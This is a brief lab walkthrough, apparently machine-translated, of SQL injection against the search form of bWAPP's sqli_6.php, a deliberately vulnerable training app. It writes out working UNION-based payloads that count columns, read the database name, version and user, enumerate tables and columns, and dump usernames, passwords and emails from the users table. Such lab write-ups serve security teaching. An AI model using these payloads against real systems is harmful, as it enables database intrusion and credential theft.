1, post-type injection must first find the post parameters, in the search box after the "1" submitted, press F12 to view the review elements, find "Network", then click the Post item, and then click on the right "parameters" to see the post parameters "title", such as:
2, start the construction, enter "Title=1" in the post field of Hackbar, submit, return error contains "%", so can be determined is the search type injection. Results such as:
Enter "title=1% ' and '% ' = '", no error, description is search-type injection, results such as:
3, Judge the number of fields:
Enter "title=1% ' ORDER by 7 #+" normal; input "title=1% ' ORDER by 8 #+" error, the number of fields is 7, here comments with "#" normal, with "-" will error, I do not know why, the results such as:
Look at the display location, enter "title=1% ' union select 1,2,3,4,5,6,7 #+", result
4, query database and other information:
Enter "title=1%" union Select 1,database (), version (), 4,user (), 6,7 #+ ", query database name, database version, current user, results
5. Query Table name:
Enter "title=1%" union Select 1,database (), version (), Table_name,user (), 6,7 from Information_schema.tables where Table_ Schema= ' Bwapp ' #+ ', more important is the users table, the result
6. Query Field Name:
Enter "title=1%" union Select 1,database (), version (), Column_name,user (), 6,7 from Information_schema.columns where Table_ Name= ' users ' #+, the more important field names are admin, password, email, results
7, query the contents of the field:
Enter "title=1%" union Select 1,database (), version (), Group_concat (admin, "| |", password, "| |", email), User (), 6,7 from users #+ ", Results
Again, it's interesting to try other tables and fields.
The Bwapp of SQL injection sqli_6.php